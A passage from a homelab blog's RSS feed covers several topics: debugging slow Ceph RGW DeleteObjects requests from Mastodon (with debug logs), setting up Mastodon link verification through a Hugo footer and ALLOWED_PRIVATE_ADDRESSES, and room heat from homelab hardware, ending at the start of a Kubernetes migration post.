2024-10-26T07:35:08.732+0000 7fb427af4700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:34:08.671 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.061012268s
2024-10-26T07:36:16.833+0000 7fb3e426d700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:35:16.772 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.061012268s
2024-10-26T07:37:32.930+0000 7fb48e3c1700  1 beast: 0x7fb3ce1bf660: 260.0.0.10 - mastodon [26/Oct/2024:07:36:32.873 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.057010651s
2024-10-26T07:41:09.146+0000 7fb430305700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:40:09.093 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.053012848s
2024-10-26T07:44:17.253+0000 7fb44eb42700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:43:17.196 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.057010651s
2024-10-26T07:49:33.370+0000 7fb4b2c0a700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:48:33.305 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.065013885s
2024-10-26T08:00:06.441+0000 7fb4202e5700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:07:59:06.396 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.044975281s
2024-10-26T08:03:20.760+0000 7fb4963d1700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:02:20.711 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.048984528s
2024-10-26T08:04:36.873+0000 7fb4cdc40700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:03:36.812 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 404 219 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=60.060985565s
2024-10-26T08:09:00.294+0000 7fb4042ad700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:08:59.246 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.048017383s
2024-10-26T08:12:22.101+0000 7fb404aae700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:12:21.033 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.068017721s
2024-10-26T08:13:15.786+0000 7fb404aae700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:13:14.742 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.044017315s
2024-10-26T08:15:44.468+0000 7fb4172d3700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:15:43.404 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.064017773s
2024-10-26T08:18:53.404+0000 7fb3dca5e700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:18:52.336 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.068017840s
2024-10-26T08:41:17.738+0000 7fb4042ad700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:41:16.690 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.048017621s
2024-10-26T08:47:17.448+0000 7fb41aada700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:47:16.404 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.044017553s
2024-10-26T08:50:33.055+0000 7fb4042ad700  1 beast: 0x7fb3ce240660: 260.0.0.10 - mastodon [26/Oct/2024:08:50:31.987 +0000] &#34;POST /mastodon?delete HTTP/1.1&#34; 200 137 - &#34;aws-sdk-ruby3/3.209.0 ua/2.1 api/s3#1.166.0 os/linux md/aarch64 lang/ruby#3.3.5 md/3.3.5 m/A,N&#34; - latency=1.068017960s
</code></pre><p>This result somehow makes even less sense than the previous ones. Why would deleting
a single object per request sometimes take 60 seconds, and sometimes just 1
second?
I had no idea whatsoever. But the result convinced me that Mastodon was likely
not at fault here. There had to be some issue with my Ceph cluster&rsquo;s RGW setup.</p>
<h2 id="digging-deep">Digging deep</h2>
<p>Thinking that the issue had to be in the Ceph RadosGW (the Ceph component providing
an S3 API), I first increased the debug level to max and did some more delete
attempts.</p>
<p>I enabled the debug logs in the RGW daemons with this command:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span>ceph config set client.rgw debug_rgw 20/5
</span></span></code></pre></div><p>This spits out a lot of debug logs. I shortened the logs below.</p>
<p>Here are the logs of a working one:</p>
<pre tabindex="0"><code>0.000000000s initializing for trans_id = tx000003cf3e5d2ed1c29cf-00671ccd8a-4445ad-homenet
0.000000000s rgw api priority: s3=8 s3website=7
0.000000000s host=s3.example.com
0.000000000s subdomain= domain= in_hosted_domain=0 in_hosted_domain_s3website=0
0.000000000s final domain/bucket subdomain= domain= in_hosted_domain=0 in_hosted_domain_s3website=0 s-&gt;info.domain= s-&gt;info.request_uri=/mastodon
[...]
0.004000068s s3:multi_object_delete reading permissions
0.004000068s s3:multi_object_delete init op
0.004000068s s3:multi_object_delete verifying op mask
0.004000068s s3:multi_object_delete required_mask= 4 user.op_mask=7
0.004000068s s3:multi_object_delete verifying op permissions
1.004017115s s3:multi_object_delete NOTICE: call to do_aws4_auth_completion
1.004017115s s3:multi_object_delete v4 auth ok -- do_aws4_auth_completion
1.004017115s s3:multi_object_delete NOTICE: call to do_aws4_auth_completion
1.004017115s s3:multi_object_delete -- Getting permissions begin with perm_mask=50
[...]
1.004017115s s3:multi_object_delete verifying op params
1.004017115s s3:multi_object_delete pre-executing
1.004017115s s3:multi_object_delete check rate limiting
1.004017115s s3:multi_object_delete executing
1.004017115s s3:multi_object_delete get_obj_state: rctx=0x7fb3ce13d9a0 obj=mastodon:cache/media_attachments/files/113/278/263/816/166/764/original/cf2d002b5ad122a0.png state=0x564633f22de8 s-&gt;prefetch_data=0
1.004017115s s3:multi_object_delete WARNING: blocking librados call
1.004017115s s3:multi_object_delete manifest: total_size = 302601
1.004017115s s3:multi_object_delete get_obj_state: setting s-&gt;obj_tag to 87393fd3-1c76-49fc-bed3-c132da8963ec.4434159.8185423419560928886
1.004017115s s3:multi_object_delete get_obj_state: rctx=0x7fb3ce13d9a0 obj=mastodon:cache/media_attachments/files/113/278/263/816/166/764/original/cf2d002b5ad122a0.png state=0x564633f22de8 s-&gt;prefetch_data=0
1.004017115s s3:multi_object_delete get_obj_state: rctx=0x7fb3ce13d9a0 obj=mastodon:cache/media_attachments/files/113/278/263/816/166/764/original/cf2d002b5ad122a0.png state=0x564633f22de8 s-&gt;prefetch_data=0
1.004017115s s3:multi_object_delete  bucket index object: homenet.rgw.buckets.index:.dir.87393fd3-1c76-49fc-bed3-c132da8963ec.4314167.1.16
1.016017318s s3:multi_object_delete WARNING: blocking librados call
1.044017792s s3:multi_object_delete cache get: name=homenet.rgw.log++bucket.sync-source-hints.mastodon : hit (negative entry)
1.044017792s s3:multi_object_delete cache get: name=homenet.rgw.log++bucket.sync-target-hints.mastodon : hit (negative entry)
1.044017792s s3:multi_object_delete chain_cache_entry: cache_locator=
1.044017792s s3:multi_object_delete chain_cache_entry: couldn&#39;t find cache locator
1.044017792s s3:multi_object_delete couldn&#39;t put bucket_sync_policy cache entry, might have raced with data changes
1.044017792s s3:multi_object_delete completing
1.044017792s s3:multi_object_delete op status=0
1.044017792s s3:multi_object_delete http status=200
</code></pre><p>Note how most of the time here is spend verifying the permissions. Almost an
entire second. The actual deletion process doesn&rsquo;t seem to take any time at all.</p>
<p>Here&rsquo;s another log, this one from a failed execution which ran into a timeout:</p>
<pre tabindex="0"><code>0.000000000s initializing for trans_id = tx00000ce815c8f63c5944a-00671cc609-441e22-homenet
0.000000000s rgw api priority: s3=8 s3website=7
0.000000000s host=s3.example.com
0.000000000s subdomain= domain= in_hosted_domain=0 in_hosted_domain_s3website=0
0.000000000s final domain/bucket subdomain= domain= in_hosted_domain=0 in_hosted_domain_s3website=0 s-&gt;info.domain= s-&gt;info.request_uri=/mastodon
[...]
0.004000000s s3:multi_object_delete reading permissions
0.004000000s s3:multi_object_delete init op
0.004000000s s3:multi_object_delete verifying op mask
0.004000000s s3:multi_object_delete required_mask= 4 user.op_mask=7
0.004000000s s3:multi_object_delete verifying op permissions
60.060012817s op-&gt;ERRORHANDLER: err_no=-2 new_err_no=-2
60.060012817s get_system_obj_state: rctx=0x7fa5c1848690 obj=homenet.rgw.log:script.postrequest. state=0x56036bf760a0 s-&gt;prefetch_data=0
60.060012817s cache get: name=homenet.rgw.log++script.postrequest. : hit (negative entry)
60.060012817s s3:multi_object_delete op status=-2
60.060012817s s3:multi_object_delete http status=404
</code></pre><p>Here, the next log line, <code>NOTICE: call to do_aws4_auth_completion</code> never
appears, instead the operation fails because Mastodon runs into its 60 second
S3 read timeout and closes the connection. In the working call, the next log
line also only appeared after a long delay, almost one second, but it did appear.
Here, nothing seems to be happening.</p>
<p>I had a look at the source code of the RGW as well (yay, open source!).
I was able to find the function which produces the <code>verifying op permissions</code>
log line at <a href="https://github.com/ceph/ceph/blob/f817ceb7f187defb1d021d6328fa833eb8e943b3/src/rgw/rgw_process.cc#L220">line 220 in rgw_process.cc</a>.
That calls <code>verify_permission</code> on the <code>DeleteObjects</code> API implementation,
in <a href="https://github.com/ceph/ceph/blob/f817ceb7f187defb1d021d6328fa833eb8e943b3/src/rgw/rgw_op.cc#L6746">rgw_op.cc</a>.
But that was as far as I got. I tried to google around a bit for the names of
the functions I had identified, but the only thing I found was <a href="https://tracker.ceph.com/issues/63373">this bug</a>
about a potential deadlock issue. But in the end it also didn&rsquo;t read like
anything useful.</p>
<p>At this point I pretty much gave up. I toyed a bit with the idea that perhaps
there was some issue with the RGW client contacting the MON daemon while
checking the permissions, but then realized that this is not Ceph auth, but
S3 auth, which is done entirely inside the RGW daemon.</p>
<p>It was quite interesting to rummage through the Ceph RGW codebase, but sadly
it did not yield any results.</p>
<h2 id="updating-ceph">Updating Ceph</h2>
<p>As a last ditch attempt at a fix, I decided to update my baremetal Ceph cluster
to v18. That also did not fix the issue, but it was still a good idea to do,
considering that v17 has been out of support for a while now.</p>
<h2 id="it-works---after-a-fashion">It works - after a fashion</h2>
<p>So the end result of all the time I spend on this was a whole lot of &ldquo;not very much&rdquo;.
But it still did something. Here&rsquo;s the development of the total number of Ceph
objects in the cluster after the big deletion:</p>
<figure>
    <img loading="lazy" src="objects-regular-cleanup.png"
         alt="Another Grafana time series visualization screenshot. This one shows the total RADOS objects in the cluster again. It starts on October 23rd and goes to November 26th. It has a see-saw look to it. In some intervals, the number rises consistently to then drop precipitously. In others, the day sees consistent growth again, but followed right away with a smaller drop. The main feature is the un-eveness. Sometimes the drop is daily, and sometimes only once a week. There&#39;s no obvious pattern."/> <figcaption>
            <p>The deletions happen unevenly.</p>
        </figcaption>
</figure>

<p>As the graph shows, deletion does now work. But it works unevenly. Sometimes,
I&rsquo;m getting no objects deleted at all, with the job failing after it runs out of
retries for the first deletion already. And sometimes it successfully runs for
hours and deletes 10k objects. I&rsquo;m happy to see that it works at all, but I&rsquo;m
still a bit disappointed that I wasn&rsquo;t able to figure out what the actual
problem was.</p>
<p>Finally, here is a graph of the stored data in the Ceph pool which houses the
Mastodon S3 bucket:</p>
<figure>
    <img loading="lazy" src="stored-data-bulk.png"
         alt="The last Grafana time series screenshot for today. I promise. This one shows the Stored User Data Per Pool, specifically for my &#39;bulk&#39; pool. This pool houses the Mastodon S3 bucket. The graph shows the same time interval as the previous one. A comparison shows that the Mastodon S3 bucket contains a lot of objects, but not that much data. The drops in stored data occur at the same time as the drops in the total number of objects, but it is clear that the drops in the total object counts are bigger than the drop in used storage. Overall, the plot starts out at 1.94 TiB and, through a number of rises and drops ends at 1.95 TiB. The drops are almost all smaller than 0.01 TiB. The Y axis goes from 1.94 TiB to 1.96 TiB, illustrating how relatively small the change in overall used storage is over roughly a month."/> <figcaption>
            <p>This plot shows the amount of storage used in my HDD backed bulk storage pool, which backs Mastodon&rsquo;s S3 bucket.</p>
        </figcaption>
</figure>

<p>The main thing to note on this plot is the relatively small change. Note that the
Y axis goes only from 1.94 TiB to 1.96 TiB. Even the largest drop is below 10 GiB.
Compare for example the first larger drop, late on October 26th, on both plots.
In the object count plot, this is a reduction of 20k objects. But those only
make up for under 10 GiB on the used storage plot.</p>
<h2 id="conclusion">Conclusion</h2>
<p>Quite honestly, even though I was not able to get to the bottom of the issue,
I still enjoyed the process. It was a really nice Homelabbing task.
I especially enjoyed the trip into the Ceph RGW C++ source code. It doesn&rsquo;t
happen often that I get to use my C++ proficiency in the Homelab. Most things
are implemented in Go or web languages.</p>
<p>So how to go forward with this? I&rsquo;m not quite sure. It&rsquo;s &ldquo;good enough&rdquo; for now,
and at least I&rsquo;ve learned to keep an eye on it. I&rsquo;ve also increased the priority
of the task for setting up monitoring of the S3 buckets and their sizes slightly.
The overall object count was a pretty good proxy here, but I&rsquo;d like to have
the history for specific buckets.
I also want to return here at some point, to really look into Ceph&rsquo;s RGW, with
the goal of setting up a VM test cluster and trying to reproduce the issue with
a minimal example. Because right now I don&rsquo;t have anything I could put into a
bug report against Ceph (as noted in the beginning, I&rsquo;m pretty sure this is an
issue in Ceph, not Mastodon) besides lots of hand waving. And &ldquo;there&rsquo;s something
wrong with the RGW&rsquo;s handling of the DeleteObjects API&rdquo; just isn&rsquo;t a useful
bug report.
I&rsquo;m also still considering writing a feature request towards Mastodon, to
perhaps introduce an env variable to allow switching the Vacuum job from using
the DeleteObjects S3 API to using DELETE requests similar to what <code>tootctl</code> does.
But there again, this doesn&rsquo;t look like a Mastodon issue to me, and the team
really already has enough things on its plate.</p>
]]></content:encoded>
    </item>
    <item>
      <title>How to configure Mastodon link verification</title>
      <link>https://blog.mei-home.net/posts/mastodon-link-verification/</link>
      <pubDate>Thu, 14 Nov 2024 22:03:05 +0100</pubDate>
      <guid>https://blog.mei-home.net/posts/mastodon-link-verification/</guid>
      <description>You need to be aware of private IP blocking</description>
      <content:encoded><![CDATA[<p>To distract myself from the fact that the last commit in the repo for my
<a href="/posts/k8s-migration-12-backup-issues/#over-engineered-but-hopefully-fun">k8s Backup Operator</a>
was about one month ago, I decided to tackle a random assortment of tasks.
One of them was to finally set up <a href="https://joinmastodon.org/verification">link verification</a>
for my Blog on Mastodon.
It looks like this when it&rsquo;s working:</p>
<figure>
    <img loading="lazy" src="profile.png"
         alt="A screenshot of my Mastodon profile page. In the link section, it has the URL of this blog, with a green background and a green check mark in front of it."/> <figcaption>
            <p>My Mastodon profile with the link to this blog properly verified, as indicated by the green check mark.</p>
        </figcaption>
</figure>

<p>I went through some issues in <a href="https://gohugo.io/">Hugo</a>, the blogging software
I&rsquo;m using, and <a href="https://github.com/adityatelange/hugo-PaperMod">PaperMod</a>, my
blog&rsquo;s theme and finally came across <a href="https://github.com/adityatelange/hugo-PaperMod/discussions/896">this discussion</a>
on the theme&rsquo;s GitHub page.
It proposes to add the required link back to my Mastodon profile in the footer.</p>
<p>The advice to copy+paste the entire content of the theme&rsquo;s <code>footer.html</code> and
then putting it into Hugo&rsquo;s override folder seemed a bit too complex after
I saw this line in the <code>footer.html</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>{{- partial &#34;extend_footer.html&#34; . }}
</span></span></code></pre></div><p>Looking further at <code>extend_footer.html</code>, I found this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>{{- /* Footer custom content area start */ -}}
</span></span><span style="display:flex;"><span>{{- /*     Insert any custom code web-analytics, resources, etc. here */ -}}
</span></span><span style="display:flex;"><span>{{- /* Footer custom content area end */ -}}
</span></span></code></pre></div><p>Feeling adventurous, I added the following content at <code>layouts/partials/extend_footer.html</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-html" data-lang="html"><span style="display:flex;"><span>&lt;<span style="color:#f92672">footer</span> <span style="color:#a6e22e">class</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;footer&#34;</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;<span style="color:#f92672">span</span>&gt;
</span></span><span style="display:flex;"><span>        &lt;<span style="color:#f92672">a</span> <span style="color:#a6e22e">rel</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;me&#34;</span> <span style="color:#a6e22e">href</span><span style="color:#f92672">=</span><span style="color:#e6db74">&#34;https://social.mei-home.net/@mmeier&#34;</span>&gt;Mastodon Verification Link&lt;/<span style="color:#f92672">a</span>&gt;
</span></span><span style="display:flex;"><span>    &lt;/<span style="color:#f92672">span</span>&gt;
</span></span><span style="display:flex;"><span>&lt;/<span style="color:#f92672">footer</span>&gt;
</span></span></code></pre></div><p>This is the file in my blog&rsquo;s top-level directory, not the similar directory
in the theme.
You can see the results of this addition at the very bottom of this post.</p>
<p>The correct HTML to be added is provided right inside Mastodon. Have a look at
&ldquo;Preferences&rdquo; -&gt; &ldquo;Public profile&rdquo; -&gt; &ldquo;Verification&rdquo;:</p>
<figure>
    <img loading="lazy" src="verification-page.png"
         alt="A screenshot of Mastodon&#39;s preferences page. The &#39;Public profile&#39; menu option is chosen in the main menu, and the tab &#39;Verification&#39; is chosen in the top menu. The page reads like this: Website Verification Verifying your identity on Mastodon is for everyone. Based on open web standards, now and forever free. All you need is a personal website that people recognize you by. When you link to this website from your profile, we will check that the website links back to your profile and show a visual indicator on it. Here is how: Copy and past the code below into the HTML of your website. Then add the address of your website into one of the extra fields on your profile from the &#39;Edit profile&#39; tab and save changes. The HTML code shown reads &lt;a rel=&#39;me&#39; href=&#39;https://social.mei-home.net/@mmeier&#39;&gt;Mastodon&lt;/a&gt;"/> <figcaption>
            <p>Mastodon&rsquo;s link verification page.</p>
        </figcaption>
</figure>

<p>In the end I&rsquo;m not sure I really need this extra link. The PaperMod theme already
includes &lsquo;me&rsquo; in the &lsquo;rel&rsquo; attribute of the link to my Mastodon profile anyway.
But I haven&rsquo;t gotten around to testing whether that&rsquo;s enough yet.</p>
<p>But even after adding this link to my blog successfully, I still wasn&rsquo;t seeing
link verification. Which was when I asked for help from the Fediverse. The first
useful reply was <a href="https://chaos.social/@HeNeArXn/113461123679972454">this one</a>,
which told me that my blog was indeed showing up as verified on other instances.
This was rather helpful, as it indicated that the problem was with my Mastodon
instance instead of with the blog&rsquo;s config.</p>
<p>I then proceeded to have a look at my blog&rsquo;s access logs. Luckily, Mastodon
always sends along the name of the instance in the User Agent header. And I
couldn&rsquo;t find my own instance anywhere in there.
At the same time, I also tried to <code>curl</code> the blog from inside the Mastodon
sidekiq container. I did not have any issues, and received my blog&rsquo;s homepage
as expected.</p>
<p>The solution finally came in <a href="https://chaos.social/@HeNeArXn/113461259794934516">this post</a>.
It noted that by default, Mastodon does not send HTTP requests (like the one
necessary to fetch the blog&rsquo;s homepage) to the private IP range.</p>
<p>Internally, I&rsquo;m hosting both my blog and Mastodon in my Homelab. I&rsquo;ve also got
all of my domains pointing to an internal reverse proxy in my DNS. So the Mastodon request
fetching my blog for link verification would get back an IP in the private range
when resolving <code>blog.mei-home.net</code>, and would then not access the page at all.</p>
<p>Luckily, Mastodon has an environment variable to configure that behavior and
allowlisting an IP in the private range, <a href="https://docs.joinmastodon.org/admin/config/#allowed_private_addresses">see here</a>.
So the only thing I needed to do was to add the following to my Mastodon config:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span>ALLOWED_PRIVATE_ADDRESSES <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;10.0.0.12&#34;</span>
</span></span></code></pre></div><p>Where <code>10.0.0.12</code> is the IP of the internal host which runs the internal
reverse proxy to which <code>blog.mei-home.net</code> resolves.</p>
<p>And with that, the link to my blog is finally verified.</p>
<p>Finally, a big thanks to Fediverse user <a href="https://chaos.social/@HeNeArXn">@HeNeArXn</a>,
who helped me solve this particular mystery.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Homelab Heating?</title>
      <link>https://blog.mei-home.net/posts/homelab-heat/</link>
      <pubDate>Wed, 21 Aug 2024 00:40:09 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/homelab-heat/</guid>
      <description>It&amp;#39;s getting hot in here.</description>
      <content:encoded><![CDATA[<p>I&rsquo;ve been sitting on this topic since last summer, which was the first one
during which I&rsquo;ve had temperature measurements and history available for my
living room. Said living room is also where my Homelab lives, right next to my
desk. I&rsquo;ve never really minded that, but it sitting right next to me most of
the time was one factor in deciding to go with low-power Raspberry Pis instead
of a couple of Enterprise grade servers. But now I think I discovered a real
problem: Heat.</p>
<p>We&rsquo;ve had a couple of mild days after the recent heat wave in Germany. And
somehow I wasn&rsquo;t able to cool down my living room properly. The temps go down
while I have my balcony door open, but they also go up rapidly again once I
close it.</p>
<p>Here is the main figure I want to talk about:
<figure>
    <img loading="lazy" src="temps.png"
         alt="Sorry to the screenreader users. The detailed behavior of the curves is actually important for this blog post, and I know it got a bit wordy. I hope it is still somewhat clear what&#39;s going on in the graph. A screenshot of a Grafana time series. On the Y axis, it shows the dates from August 18th 00:00 to August 20th 20:00. It shows two temperature curves. The consistently higher one, shown in orange, is referenced in further text as the indoor/living room temperature. The consistently lower one shows the outdoor temperature. The outdoor temperature starts out at 22.5° C. It stays above 20° C until 18:00 on the 18th. Then it starts falling towards the lowest point at 15.2° at 06:00 on the 19th. It rises a bit throughout that day, but its maximum on the 19th is 18.3° C. It only rises above 20° C in a sudden spike on the next day, August 20th, shortly past 18:00 before falling back to 19°. The second curve, the indoor temperature, starts at 27.9° C. Around 01:00 on the 18th, it starts falling slowly to 26.9° at 08:40. Starting there, it falls more steeply, towards 25°. At around 15:00 it starts rising back to a max of 27°. Then it falls rapidly again to 25° at 20:30. Then it rises back to a max of 27° at 01:00, where the slow fall happens again until 08:40, where the more rapid fall happens again. Shortly thereafter it rises again rapidly, just to fall rapidly again. At 12:15 on the 19th, it rises again, first steeply, then more gradually, to a max of 26.5° at 01:00. Then the slow fall happens again until 08:40 on the 20th, finally followed by another steep rise plus slower rise as before. But the slower rise now peters out at about 26° C around 21:00 on the 20th."/> <figcaption>
            <p>Temperature measurements from August the 18th 00:00 to August 20th 22:00. The orange upper curve is the indoor temperature for my living room with the Homelab and my desktop machine in it, and the red, lower curve is the outside temperature measured on my balcony.</p>
        </figcaption>
</figure>
</p>
<p>The above temperature measurements have been made in my living room on a wall which is not near either my Homelab nor my desktop machine.
The outside measurement was made on my balcony, from under a table. The large spike in the outdoor temperature can be ignored, that&rsquo;s an artifact from the placement
of the sensor and that was probably the sun coming out for a while.
The measurements are made with the same type of sensor, but those sensors are
not anything fancy. But in this post, I&rsquo;d like to discuss the temperature behavior,
so the correctness of the absolute values is not too important, as long as the
sensors are off by a consistent number, which I believe they are.</p>
<p>As I&rsquo;ve noted above, these measurements were taken between the 18th and 20th
of August, which were relatively cloudy days with relatively low temperatures
for mid-August. These three days were a welcome respite from the heat, and I
wanted to use them to get the heat out of my apartment. Note that I don&rsquo;t have
A/C in here, so any cooling has to come from cool air being let inside the
place. This generally happens in two ways in my living room:</p>
<ol>
<li>During the night, before going to sleep, I half-open my balcony door. I&rsquo;m not
sure whether that&rsquo;s even a thing in other countries? Anyway, it basically means that instead of opening the door to either side, I instead tilt it just a bit towards
the inside.</li>
<li>Once I get up, I generally open the door fully</li>
</ol>
<p>Before going into the graph, let&rsquo;s describe the &ldquo;me&rdquo; factor in the measurements.
I started a one-week leave on Monday, so I was home most of the day during
Sunday and Monday, the 18th and 19th. On the 20th, I started a trip to visit
family around 12:00 and haven&rsquo;t been back since then.</p>
<p>When it comes to computers in that room, it holds both my Homelab and my desktop
machine, plus two 22&quot; screens. The Homelab, meaning 13 Raspberry Pi 4, five
low to mid power x86 machines and a passively cooled 16 port switch eats about
200 - 220 Watts constantly.
My desktop uses about 100W - 120W during normal web surfing/Youtube/Dev usage
and about 230W when gaming. Plus another 30 or so Watts for the two monitors.
I switch the desktop on in the morning and switch it off before going to bed.</p>
<p>Then there&rsquo;s also the human factor in this, because I was in the same room most
of the time, minus the nights, but I will ignore that for the sake of this
discussion.</p>
<p>So the base load of the room is a constant ~220W from the Homelab, plus another
150W - 260W from my desktop setup during waking hours.</p>
<p>Now onto a bit of behavioral description when it comes to ventilation. I went to
bed every night around 01:00, at which time I tilt my living room balcony door
and open my bathroom door and tilt its window as well for some through-ventilation.
These account for the relatively slow nighttime drops of the temps throughout the
graph. Then when getting up around 08:40, I open the balcony door fully. This
event can also be seen very clearly in the graph as a sharp temp drop.</p>
<p>And here we come to the point of this whole post: Once I close the balcony door,
the temp immediately rises sharply and reaches almost to the previous max again.
And just for those who are wondering: Yes, I&rsquo;ve checked multiple times whether
I accidentally put on the heating.</p>
<p>Note also the difference in the climb from 12:00 on the 19th and 12:00 on the
20th. On the 19th, it climbs quite high, to 26.5° C or so, while on the 20th
it peters out around 26° already.</p>
<p>The explanation seems pretty obvious, of course - at the peak, I&rsquo;m dumping about
480 Watts worth of heat into that room, plus whatever my body produces.
I&rsquo;m just a bit surprised at how rapidly the temps rise after closing the balcony
door.</p>
<p>I would have really loved to put some math into this, but my google-fu is utterly
deserting me. I&rsquo;ve gone up to page eight now and not found anything better than
&ldquo;yes, every Watt of electricity consumed is turned into heat&rdquo;.</p>
<p>This is another reason to get a move on with the Kubernetes migration, as
finishing that would allow me to get the Homelab back to around 150W.</p>
<p>In conclusion: I should really be looking for an apartment with a well-ventilated
separate room for the Homelab and switch my desktop to rack-mounted while I&rsquo;m
at it.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Nomad to k8s, Part 13: Almost one year</title>
      <link>https://blog.mei-home.net/posts/k8s-migration-13-almost-one-year/</link>
      <pubDate>Thu, 15 Aug 2024 00:10:02 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/k8s-migration-13-almost-one-year/</guid>
      <description>Motivation hole</description>
      <content:encoded><![CDATA[<p>Wherein I realize that I&rsquo;ve been at this for almost a year now.</p>
<p>This is part 14 of my <a href="https://blog.mei-home.net/tags/k8s-migration/">k8s migration series</a>.</p>
<p>It has been quite a while since I last wrote a blog post about the migration.
